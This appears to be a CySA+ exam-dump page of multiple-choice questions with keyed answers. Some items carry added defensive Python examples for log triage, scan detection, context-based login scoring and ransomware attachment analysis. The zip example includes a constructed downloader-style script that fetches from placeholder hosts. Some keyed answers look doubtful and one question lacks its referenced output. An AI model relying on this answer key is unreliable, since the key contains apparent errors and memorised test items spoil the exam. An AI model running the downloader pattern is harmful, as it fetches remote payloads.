CompTIA CySA+ Certification Exam v1.0 (CS0-001)

Page:    1 / 28   
Total 416 questions

While a threat intelligence analyst was researching an indicator of compromise on a search engine, the web proxy generated an alert regarding the same indicator. The threat intelligence analyst states that related sites were not visited but were searched for in a search engine. Which of the following MOST likely happened in this situation?

  • A. The analyst is not using the standard approved browser.
  • B. The analyst accidently clicked a link related to the indicator.
  • C. The analyst has prefetch enabled on the browser in use.
  • D. The alert is unrelated to the analyst’s search.


Answer : C

Explanation:
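The distinction the question turns on (a search-result link that the browser fetched speculatively versus a page the analyst actually opened) is visible in proxy logs if the proxy records request headers. The following is an added example, not part of the exam page: it assumes a constructed proxy log layout and sample lines, and matches the indicator on the request host rather than on the whole URL so the search-engine query that merely contains the indicator is not counted as a visit.

```python
"""Separate user-initiated visits to an indicator from hits generated by
browser prefetch.  Added example, not part of the exam page; the proxy log
layout and the sample lines are constructed for illustration."""
import re
from urllib.parse import urlsplit

# Request headers browsers attach to speculative fetches: Chrome/Edge send
# "Purpose: prefetch" (newer builds also "Sec-Purpose: prefetch"), Firefox
# sends "X-moz: prefetch".  A proxy that records request headers will show them.
PREFETCH_HEADERS = {"purpose": "prefetch", "sec-purpose": "prefetch", "x-moz": "prefetch"}

# Constructed layout: "<ts> <client_ip> <method> <url> <status>[ hdr=k:v;k:v]"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)"
    r"(?: hdr=(?P<hdrs>\S*))?$"
)

def parse_headers(raw):
    """'K:v;K2:v2' -> {'k': 'v', 'k2': 'v2'} (empty when no headers were logged)."""
    out = {}
    for pair in filter(None, (raw or "").split(";")):
        k, _, v = pair.partition(":")
        out[k.strip().lower()] = v.strip().lower()
    return out

def parse_line(line):
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["headers"] = parse_headers(entry.pop("hdrs"))
    entry["host"] = urlsplit(entry["url"]).hostname or ""
    return entry

def is_prefetch(entry):
    return any(entry["headers"].get(k) == v for k, v in PREFETCH_HEADERS.items())

def triage(lines, indicator_domain):
    """Return (user_visits, prefetch_hits): URLs whose host is the indicator
    domain (or a subdomain), split by whether the request was a prefetch.
    Matching on the host, not the whole URL, keeps the search-engine query
    that merely contains the indicator out of both lists."""
    user_visits, prefetch_hits = [], []
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue
        if not (e["host"] == indicator_domain or e["host"].endswith("." + indicator_domain)):
            continue
        (prefetch_hits if is_prefetch(e) else user_visits).append(e["url"])
    return user_visits, prefetch_hits

# Constructed sample: the analyst (10.0.0.5) searches and the browser prefetches
# the top result; a different client (10.0.0.9) actually browses to the site.
SAMPLE_LOG = [
    "2023-05-04T10:01:02Z 10.0.0.5 GET https://www.google.com/search?q=evil-domain.example 200",
    "2023-05-04T10:01:03Z 10.0.0.5 GET http://evil-domain.example/ 403 hdr=Purpose:prefetch;Accept:*/*",
    "2023-05-04T10:01:03Z 10.0.0.5 GET http://www.evil-domain.example/favicon.ico 403 hdr=Sec-Purpose:prefetch",
    "2023-05-04T10:05:40Z 10.0.0.9 GET http://evil-domain.example/login 403 hdr=Accept:text/html",
]

if __name__ == "__main__":
    visits, prefetches = triage(SAMPLE_LOG, "evil-domain.example")
    print("user-initiated:", visits)
    print("prefetch only :", prefetches)
```

Only the entries in the first list warrant incident handling; the prefetch hits are worth a ticket to disable link prefetching on analyst workstations so research does not keep tripping the proxy.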

Which of the following remediation strategies are MOST effective in reducing the risk of a network-based compromise of embedded ICS? (Choose two.)

  • A. Patching
  • B. NIDS
  • C. Segmentation
  • D. Disabling unused services
  • E. Firewalling


Answer : CD

Explanation:

An analyst is observing unusual network traffic from a workstation. The workstation is communicating with a known malicious site over an encrypted tunnel. A full antivirus scan with an updated antivirus signature file does not show any sign of infection. Which of the following has occurred on the workstation?

  • A. Zero-day attack
  • B. Known malware attack
  • C. Session hijack
  • D. Cookie stealing


Answer : A

Explanation:

A university wants to increase the security posture of its network by implementing vulnerability scans of both centrally managed and student/employee laptops.
The solution should be able to scale, provide minimum false positives and high accuracy of results, and be centrally managed through an enterprise console.
Which of the following scanning topologies is BEST suited for this environment?

  • A. A passive scanning engine located at the core of the network infrastructure
  • B. A combination of cloud-based and server-based scanning engines
  • C. A combination of server-based and agent-based scanning engines
  • D. An active scanning engine installed on the enterprise console


Answer : D

Explanation:

A cybersecurity analyst is completing an organization’s vulnerability report and wants it to reflect assets accurately. Which of the following items should be in the report?

  • A. Processor utilization
  • B. Virtual hosts
  • C. Organizational governance
  • D. Log disposition
  • E. Asset isolation


Answer : B

Explanation:

A threat intelligence feed has posted an alert stating there is a critical vulnerability in the kernel. Unfortunately, the company’s asset inventory is not current. Which of the following techniques would a cybersecurity analyst perform to find all affected servers within an organization?

  • A. A manual log review from data sent to syslog
  • B. An OS fingerprinting scan across all hosts
  • C. A packet capture of data traversing the server network
  • D. A service discovery scan on the network


Answer : B

Explanation:
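An OS fingerprinting scan (for example `nmap -O`, which needs raw-socket privileges) produces an operating-system guess per live host, and that guess can be matched against the affected kernel range when the inventory cannot be trusted. The following is an added example, not part of the exam page: it parses a constructed, trimmed sample in the layout of nmap's `-oX` XML output and flags hosts whose fingerprinted kernel range overlaps a hypothetical affected range. Fingerprints are approximate, so the hits are a candidate list to confirm with `uname -r` or package data, not a final answer.

```python
"""Find hosts whose fingerprinted kernel falls in an affected version range,
from nmap -O XML output.  Added example; the XML below is a constructed,
trimmed sample in the real nmap -oX layout, not real scan data."""
import re
import xml.etree.ElementTree as ET

# Constructed: what `nmap -O -oX scan.xml 10.0.0.0/24` might produce (trimmed)
NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="10.0.0.11" addrtype="ipv4"/>
    <os>
      <osmatch name="Linux 4.15 - 5.6" accuracy="97">
        <osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="4.X" accuracy="97">
          <cpe>cpe:/o:linux:linux_kernel:4</cpe>
        </osclass>
      </osmatch>
    </os>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.12" addrtype="ipv4"/>
    <os>
      <osmatch name="Microsoft Windows Server 2016" accuracy="95">
        <osclass type="general purpose" vendor="Microsoft" osfamily="Windows" osgen="2016" accuracy="95">
          <cpe>cpe:/o:microsoft:windows_server_2016</cpe>
        </osclass>
      </osmatch>
    </os>
  </host>
  <host><status state="up"/>
    <address addr="10.0.0.13" addrtype="ipv4"/>
    <os>
      <osmatch name="Linux 2.6.32" accuracy="100">
        <osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="100">
          <cpe>cpe:/o:linux:linux_kernel:2.6.32</cpe>
        </osclass>
      </osmatch>
    </os>
  </host>
  <host><status state="down"/>
    <address addr="10.0.0.14" addrtype="ipv4"/>
  </host>
</nmaprun>"""

VERSION_RE = re.compile(r"Linux (\d+(?:\.\d+)*)(?:\s*-\s*(\d+(?:\.\d+)*))?")

def vtuple(s):
    """'4.15' -> (4, 15) so ranges compare numerically, not lexically."""
    return tuple(int(x) for x in s.split("."))

def linux_range(osmatch_name):
    """'Linux 4.15 - 5.6' -> ((4,15),(5,6)); 'Linux 2.6.32' -> ((2,6,32),(2,6,32));
    None when the match is not a Linux kernel."""
    m = VERSION_RE.search(osmatch_name)
    if not m:
        return None
    lo = vtuple(m.group(1))
    hi = vtuple(m.group(2)) if m.group(2) else lo
    return lo, hi

def best_match(host):
    """nmap may list several osmatch candidates; take the most accurate."""
    matches = host.findall("os/osmatch")
    return max(matches, key=lambda om: int(om.get("accuracy", "0"))) if matches else None

def affected_hosts(xml_text, affected_lo, affected_hi):
    """Return [(ip, osmatch name)] for live hosts whose fingerprinted kernel
    range overlaps the inclusive range [affected_lo, affected_hi] (tuples)."""
    hits = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        if status is None or status.get("state") != "up":
            continue
        addr = host.find("address[@addrtype='ipv4']")
        om = best_match(host)
        if addr is None or om is None:
            continue
        rng = linux_range(om.get("name", ""))
        if rng is None:
            continue
        lo, hi = rng
        if lo <= affected_hi and hi >= affected_lo:      # interval overlap
            hits.append((addr.get("addr"), om.get("name")))
    return hits

if __name__ == "__main__":
    # Hypothetical advisory: kernels 4.0 through 5.3 affected (an assumption for the demo)
    for ip, name in affected_hosts(NMAP_XML, (4, 0), (5, 3)):
        print(f"{ip}: {name}  -> confirm with uname -r")
```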

A cybersecurity analyst traced the source of an attack to compromised user credentials. Log analysis revealed that the attacker successfully authenticated from an unauthorized foreign country. Management asked the security analyst to research and implement a solution to help mitigate attacks based on compromised passwords. Which of the following should the analyst implement?

  • A. Self-service password reset
  • B. Single sign-on
  • C. Context-based authentication
  • D. Password complexity


Answer : C

Explanation:
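Context-based authentication treats a correct password as necessary but not sufficient: the login's country, device, timing and distance from the previous login decide whether to allow, demand a second factor, or deny. The following is an added example, not a vendor's policy engine and not part of the exam page; the allowed-country list, the thresholds, the device handling and the login records are all constructed assumptions.

```python
"""Context-based (risk-based) authentication: score a login attempt on signals
beyond the password and require step-up MFA or deny when the context is
anomalous.  Added example; the country list, thresholds, device handling and
login records are constructed assumptions, not a vendor policy."""
import math
from datetime import datetime, timezone

ALLOWED_COUNTRIES = {"US", "CA"}        # assumption: countries the company operates in
MAX_PLAUSIBLE_KMH = 900.0               # faster than an airliner => impossible travel
STEP_UP_THRESHOLD, DENY_THRESHOLD = 30, 60

def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two lat/lon points in kilometres."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi, dlmb = math.radians(lat2 - lat1), math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(a))

def evaluate(attempt, last_success):
    """Score one login attempt against the user's last successful login.
    Both are dicts: ts (aware UTC datetime), country, lat, lon, device_id.
    Returns (decision, score, reasons)."""
    score, reasons = 0, []
    if attempt["country"] not in ALLOWED_COUNTRIES:
        score += 40
        reasons.append(f"login from unauthorized country {attempt['country']}")
    if last_success is not None:
        if attempt["device_id"] != last_success["device_id"]:
            score += 20
            reasons.append("unrecognised device")
        hours = (attempt["ts"] - last_success["ts"]).total_seconds() / 3600
        if hours > 0:
            km = haversine_km(attempt["lat"], attempt["lon"], last_success["lat"], last_success["lon"])
            if km / hours > MAX_PLAUSIBLE_KMH:
                score += 40
                reasons.append(f"impossible travel: {km:.0f} km in {hours:.1f} h")
    if not 6 <= attempt["ts"].hour < 22:     # off-hours (UTC here; use the user's zone in practice)
        score += 10
        reasons.append("off-hours login")
    if score >= DENY_THRESHOLD:
        return "deny", score, reasons
    if score >= STEP_UP_THRESHOLD:
        return "require_mfa", score, reasons
    return "allow", score, reasons

# Constructed records: last good login from the New York office on a known laptop
LAST_OK = {"ts": datetime(2023, 5, 4, 13, 0, tzinfo=timezone.utc), "country": "US",
           "lat": 40.71, "lon": -74.01, "device_id": "laptop-1"}
ATTEMPTS = {
    # two hours later, same (stolen) password, from Bucharest on an unknown device
    "stolen_password": {"ts": datetime(2023, 5, 4, 15, 0, tzinfo=timezone.utc), "country": "RO",
                        "lat": 44.43, "lon": 26.10, "device_id": "unknown-7"},
    # same office, same laptop, later that afternoon
    "normal": {"ts": datetime(2023, 5, 4, 16, 0, tzinfo=timezone.utc), "country": "US",
               "lat": 40.71, "lon": -74.01, "device_id": "laptop-1"},
    # Toronto at 03:00 UTC on a new tablet: plausible travel, but worth a second factor
    "new_device_night": {"ts": datetime(2023, 5, 5, 3, 0, tzinfo=timezone.utc), "country": "CA",
                         "lat": 43.65, "lon": -79.38, "device_id": "tablet-2"},
}

if __name__ == "__main__":
    for name, attempt in ATTEMPTS.items():
        print(name, evaluate(attempt, LAST_OK))
```

The stolen-password case is denied even though the password was right, which is exactly what complexity rules, SSO and self-service reset cannot do. Geo-IP data is imprecise (VPN exits, mobile carriers), so the step-up tier exists to avoid locking out legitimate travellers.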

A technician is running an intensive vulnerability scan to detect which ports are open to exploit. During the scan, several network services are disabled and production is affected. Which of the following sources would be used to evaluate which network service was interrupted?

  • A. Syslog
  • B. Network mapping
  • C. Firewall logs
  • D. NIDS


Answer : A

Explanation:
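Syslog is the right source because the daemons that crashed or were stopped by the scan log that event themselves, with a timestamp that can be lined up against the scan window. The following is an added example, not part of the exam page: it filters constructed BSD-style syslog lines for failure-looking messages inside an assumed scan window. On a systemd host, `journalctl --since ... --until ... -p err` gets the same answer without a parser.

```python
"""Pull service stop/failure events out of syslog for the window in which a
scan ran, to answer "which service did the scan knock over?".  Added example;
the log lines and the scan window are constructed, in the classic BSD syslog
layout."""
import re
from datetime import datetime

SYSLOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d{2}:\d{2}:\d{2}) "
    r"(?P<host>\S+) (?P<proc>[^\[:]+)(?:\[(?P<pid>\d+)\])?: (?P<msg>.*)$"
)
# Message fragments that mean a daemon went away; extend per platform
FAILURE_RE = re.compile(r"stopped|failed|exited|terminated|killed|segfault|core dumped", re.I)

def parse(line, year):
    """BSD syslog omits the year, so the caller supplies it."""
    m = SYSLOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['mon']} {m['day']} {m['time']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "host": m["host"], "proc": m["proc"], "msg": m["msg"]}

def interrupted_services(lines, start, end, year=2023):
    """Return [(ts, host, proc, msg)] for failure-looking events with start <= ts <= end."""
    hits = []
    for line in lines:
        e = parse(line, year)
        if e and start <= e["ts"] <= end and FAILURE_RE.search(e["msg"]):
            hits.append((e["ts"], e["host"], e["proc"], e["msg"]))
    return sorted(hits)

# Constructed lines from two servers around a scan that ran 23:00-23:30 on May 4
SCAN_START, SCAN_END = datetime(2023, 5, 4, 23, 0), datetime(2023, 5, 4, 23, 30)
SAMPLE_SYSLOG = [
    "May  4 22:58:10 app01 systemd[1]: Started Daily apt activities.",
    "May  4 23:01:07 app01 systemd[1]: snmpd.service: Main process exited, code=killed, status=11/SEGV",
    "May  4 23:01:07 app01 systemd[1]: snmpd.service: Failed with result 'signal'.",
    "May  4 23:03:52 db01 postgres[2207]: LOG:  could not accept SSL connection: EOF detected",
    "May  4 23:04:30 app01 sshd[4410]: Accepted publickey for ops from 10.0.5.20 port 51234 ssh2",
    "May  4 23:10:15 db01 systemd[1]: Stopped PostgreSQL RDBMS.",
    "May  5 08:12:00 app01 systemd[1]: Started snmpd.service.",
]

if __name__ == "__main__":
    for ts, host, proc, msg in interrupted_services(SAMPLE_SYSLOG, SCAN_START, SCAN_END):
        print(ts, host, proc, msg)
```

The keyword list is deliberately loose; the point is to shortlist candidates quickly, then read the surrounding lines for each (the SIGSEGV on snmpd above is the kind of crash a malformed probe triggers on embedded or old agents).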

A software patch has been released to remove vulnerabilities from the company’s software. A security analyst has been tasked with testing the software to ensure the vulnerabilities have been remediated and the application is still functioning properly. Which of the following tests should be performed NEXT?

  • A. Fuzzing
  • B. User acceptance testing
  • C. Regression testing
  • D. Penetration testing


Answer : C

Explanation:
Reference:
https://en.wikipedia.org/wiki/Regression_testing

During a routine review of firewall logs, an analyst identified that an IP address from the organization’s server subnet had been connecting during nighttime hours to a foreign IP address, and had been sending between 150 and 500 megabytes of data each time. This had been going on for approximately one week, and the affected server was taken offline for forensic review. Which of the following is MOST likely to drive up the incident’s impact assessment?

  • A. PII of company employees and customers was exfiltrated.
  • B. Raw financial information about the company was accessed.
  • C. Forensic review of the server required fall-back on a less efficient service.
  • D. IP addresses and other network-related configurations were exfiltrated.
  • E. The local root password for the affected server was compromised.


Answer : A

Explanation:
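The pattern the analyst spotted (one server, one foreign address, overnight, hundreds of megabytes each time, repeated for days) is easy to pull out of firewall logs programmatically once the thresholds are written down. The following is an added example over constructed key=value log lines; the field names, the server subnet, the off-hours window and the byte threshold are assumptions, not any vendor's format or defaults. Internal ranges are declared explicitly rather than via `ipaddress.is_global`, because the documentation addresses used in the sample are classed as non-global by the standard library.

```python
"""Find the pattern the question describes in firewall logs: a server-subnet
host that repeatedly sends hundreds of megabytes to one external address during
the night.  Added example over constructed key=value log lines; the field names,
subnet, thresholds and addresses are assumptions, not a vendor format."""
from collections import defaultdict
from datetime import datetime, time
import ipaddress

SERVER_NET = ipaddress.ip_network("10.10.20.0/24")       # assumption: the server subnet
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
NIGHT_START, NIGHT_END = time(22, 0), time(5, 0)        # off-hours window
BYTES_THRESHOLD = 100 * 1024 * 1024                      # 100 MB sent in one flow
MIN_DATES = 3                                            # seen on several distinct dates

def parse(line):
    kv = dict(tok.split("=", 1) for tok in line.split())
    return {"ts": datetime.strptime(kv["ts"], "%Y-%m-%dT%H:%M:%S"),
            "src": ipaddress.ip_address(kv["src"]), "dst": ipaddress.ip_address(kv["dst"]),
            "dport": int(kv["dport"]), "sent": int(kv["sent"])}

def is_external(ip):
    return not any(ip in net for net in INTERNAL_NETS)

def is_night(ts):
    t = ts.time()
    return t >= NIGHT_START or t < NIGHT_END

def suspicious_flows(lines):
    """Return {(src, dst): {"dates": n, "total_sent": bytes, "ports": {...}}}
    for server-subnet sources that pushed > BYTES_THRESHOLD to an external
    address at night on at least MIN_DATES distinct dates."""
    acc = defaultdict(lambda: {"dates": set(), "total_sent": 0, "ports": set()})
    for line in lines:
        f = parse(line)
        if f["src"] not in SERVER_NET or not is_external(f["dst"]):
            continue
        if not is_night(f["ts"]) or f["sent"] < BYTES_THRESHOLD:
            continue
        rec = acc[(str(f["src"]), str(f["dst"]))]
        rec["dates"].add(f["ts"].date())
        rec["total_sent"] += f["sent"]
        rec["ports"].add(f["dport"])
    return {pair: {"dates": len(r["dates"]), "total_sent": r["total_sent"], "ports": r["ports"]}
            for pair, r in acc.items() if len(r["dates"]) >= MIN_DATES}

# Constructed lines; the real pattern sends 300, 200, 450 and 150 MB on four nights
SAMPLE_LOG = [
    "ts=2023-05-01T23:41:10 src=10.10.20.17 dst=203.0.113.45 dport=443 sent=314572800",
    "ts=2023-05-02T14:30:00 src=10.10.20.17 dst=203.0.113.45 dport=443 sent=524288000",  # daytime
    "ts=2023-05-02T23:05:00 src=10.10.20.40 dst=10.10.30.5 dport=445 sent=734003200",    # internal backup
    "ts=2023-05-02T23:06:00 src=10.10.20.17 dst=198.51.100.9 dport=25 sent=4096",         # too small
    "ts=2023-05-02T23:52:03 src=10.10.20.17 dst=203.0.113.45 dport=443 sent=209715200",
    "ts=2023-05-03T00:14:55 src=10.10.20.17 dst=203.0.113.45 dport=443 sent=471859200",
    "ts=2023-05-03T23:30:00 src=10.10.40.3 dst=203.0.113.45 dport=443 sent=314572800",   # not server subnet
    "ts=2023-05-04T02:03:19 src=10.10.20.17 dst=203.0.113.45 dport=443 sent=157286400",
]

if __name__ == "__main__":
    for (src, dst), r in suspicious_flows(SAMPLE_LOG).items():
        print(f"{src} -> {dst}: {r['dates']} dates, {r['total_sent'] / 2**20:.0f} MB, ports {sorted(r['ports'])}")
```

Once a flow like this is confirmed, the impact question in the exam is answered by what the server held: the byte counts bound how much could have left, and the data classification of that server (PII, financials, configuration) drives the impact rating.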

A security analyst is performing a forensic analysis on a machine that was the subject of some historic SIEM alerts. The analyst noticed some network connections utilizing SSL on non-common ports, copies of svchost.exe and cmd.exe in %TEMP% folder, and RDP files that had connected to external IPs. Which of the following threats has the security analyst uncovered?

  • A. DDoS
  • B. APT
  • C. Ransomware
  • D. Software vulnerability


Answer : B

Explanation:

A threat intelligence analyst who works for a technology firm received this report from a vendor. “There has been an intellectual property theft campaign executed against organizations in the technology industry. Indicators for this activity are unique to each intrusion. The information that appears to be targeted is R&D data. The data exfiltration appears to occur over months via uniform TTPs. Please execute a defensive operation regarding this attack vector.”
Which of the following combinations suggests how the threat should MOST likely be classified and the type of analysis that would be MOST helpful in protecting against this activity?

  • A. Polymorphic malware and secure code analysis
  • B. Insider threat and indicator analysis
  • C. APT and behavioral analysis
  • D. Ransomware and encryption


Answer : C

Explanation:

The help desk informed a security analyst of a trend that is beginning to develop regarding a suspicious email that has been reported by multiple users. The analyst has determined the email includes an attachment named invoice.zip that contains the following files:

Locky.js
xerty.ini
xerty.lib
Further analysis indicates that when the .zip file is opened, it is installing a new version of ransomware on the devices. Which of the following should be done FIRST to prevent data on the company NAS from being encrypted by infected devices?

  • A. Disable access to the company VPN.
  • B. Move the files from the NAS to a cloud-based storage solution.
  • C. Set permissions on file shares to read-only.
  • D. Add the URL included in the .js file to the company’s web proxy filter.


Answer : D
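Option D presumes the analyst has already opened the attachment safely and pulled the download URL out of the script. The following is an added example, not part of the exam page: it builds an in-memory zip with the three file names from the question but harmless placeholder contents (the real Locky downloader is not reproduced), lists the script members, extracts the URLs they reference, and reduces them to hostnames for the proxy block list. The placeholder domains are assumptions.

```python
"""Triage a zip attachment like the one in the question: list the script files
it carries and pull out any URLs the scripts would fetch, so they can be handed
to the web proxy block list.  Added example; the archive and its contents are
constructed in memory with harmless placeholder text, not the real Locky files."""
import io
import re
import zipfile
from urllib.parse import urlsplit

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1", ".bat", ".cmd", ".scr", ".exe"}
URL_RE = re.compile(r"""(?:https?|ftp)://[^\s'"<>)]+""", re.I)

def build_sample_zip():
    """Constructed stand-in for invoice.zip: a downloader-style script and two junk files."""
    script = (
        'var u = "http://payload.example/dl.php?id=7";\n'
        "var w = new ActiveXObject('MSXML2.XMLHTTP');\n"
        "w.open('GET', u, false); w.send();\n"
        '// fallback: "https://backup.example/x.exe"\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Locky.js", script)
        z.writestr("xerty.ini", "[settings]\nk=1\n")
        z.writestr("xerty.lib", b"\x00" * 64)
    return buf.getvalue()

def triage_zip(data, max_member_bytes=1 << 20):
    """Return (script_members, urls).  Members are judged by their last suffix,
    case-insensitively; URLs are pulled from the text of each script member.
    Members larger than max_member_bytes are listed but not inflated (zip-bomb guard)."""
    scripts, urls = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            name = info.filename
            ext = "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""
            if ext not in SCRIPT_EXTS:
                continue
            scripts.append(name)
            if info.file_size > max_member_bytes:
                continue
            text = z.read(name).decode("utf-8", errors="replace")
            for u in URL_RE.findall(text):
                if u not in urls:
                    urls.append(u)
    return scripts, urls

def hosts_to_block(urls):
    """Distinct hostnames to hand to the proxy filter."""
    return sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})

if __name__ == "__main__":
    scripts, urls = triage_zip(build_sample_zip())
    print("script members:", scripts)
    print("urls referenced:", urls)
    print("proxy block list:", hosts_to_block(urls))
```

Do this inside a sandbox or on an isolated analysis box, never on a domain-joined workstation with the NAS mounted: the analysis itself must not become the infection that encrypts the share.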

After running a packet analyzer on the network, a security analyst has noticed the following output:


Which of the following is occurring?

  • A. A ping sweep
  • B. A port scan
  • C. A network map
  • D. A service discovery


Answer : B

Explanation:

A network technician is concerned that an attacker is attempting to penetrate the network, and wants to set a rule on the firewall to prevent the attacker from learning which IP addresses are valid on the network. Which of the following protocols needs to be denied?

  • A. TCP
  • B. SMTP
  • C. ICMP
  • D. ARP


Answer : C
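The packet-analyzer output for the port-scan question is not reproduced on this page, but the two reconnaissance patterns the last two questions rely on are easy to tell apart in a capture: a port scan is one source sending SYNs to many ports on one host, a ping sweep is one source sending ICMP echo requests to many hosts. The following is an added example covering both questions, not part of the exam page; the packet records are constructed 5-tuples in the shape of a tcpdump summary, and the window and count thresholds are assumptions. It also shows what a perimeter rule denying ICMP achieves: the sweep disappears, the TCP port scan does not, which is the caveat behind the last question (nmap falls back to TCP probes with `-Pn`).

```python
"""Tell a port scan from a ping sweep in captured traffic.  Added example for
the last two questions; the packet records are constructed 5-tuples in the
shape of a tcpdump summary, not a real capture."""
from collections import defaultdict

# (time_s, src, dst, proto, dport, info)  -- info is TCP flags or ICMP type
PACKETS = [
    # 10.0.0.99 sends a bare SYN to ports 21..30 on 10.0.0.5 within 0.1 s
    *[(1.0 + i * 0.01, "10.0.0.99", "10.0.0.5", "TCP", p, "S") for i, p in enumerate(range(21, 31))],
    (1.2, "10.0.0.5", "10.0.0.99", "TCP", 22, "SA"),        # only ssh answers
    # 10.0.0.77 sends ICMP echo requests to 10.0.0.1 .. 10.0.0.12
    *[(5.0 + i * 0.02, "10.0.0.77", f"10.0.0.{i}", "ICMP", None, "echo-request") for i in range(1, 13)],
    # a normal web session for contrast
    (9.0, "10.0.0.8", "10.0.0.5", "TCP", 443, "S"),
    (9.1, "10.0.0.5", "10.0.0.8", "TCP", None, "SA"),
]

def classify(packets, window_s=2.0, min_targets=8):
    """Return {src: "port scan" | "ping sweep"} for sources that, inside any
    window_s-second window, SYN-probe >= min_targets distinct ports on one host
    (port scan) or echo-request >= min_targets distinct hosts (ping sweep)."""
    by_src = defaultdict(list)
    for pkt in sorted(packets, key=lambda p: p[0]):
        by_src[pkt[1]].append(pkt)
    verdicts = {}
    for src, pkts in by_src.items():
        for i, pkt in enumerate(pkts):
            t0 = pkt[0]
            win = [p for p in pkts[i:] if p[0] - t0 <= window_s]
            ports_per_host = defaultdict(set)
            echo_hosts = set()
            for _, _, dst, proto, dport, info in win:
                if proto == "TCP" and info == "S":
                    ports_per_host[dst].add(dport)
                elif proto == "ICMP" and info == "echo-request":
                    echo_hosts.add(dst)
            if any(len(ports) >= min_targets for ports in ports_per_host.values()):
                verdicts[src] = "port scan"
                break
            if len(echo_hosts) >= min_targets:
                verdicts[src] = "ping sweep"
                break
    return verdicts

def drop_icmp(packets):
    """Model a perimeter rule that denies ICMP: only non-ICMP packets get through."""
    return [p for p in packets if p[3] != "ICMP"]

if __name__ == "__main__":
    print("as captured     :", classify(PACKETS))
    print("with ICMP denied:", classify(drop_icmp(PACKETS)))
```

With the sample traffic the first line reports both a port scan and a ping sweep; the second reports only the port scan, which is why denying ICMP is a partial measure and should be paired with rate-limiting or alerting on SYN fan-out.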
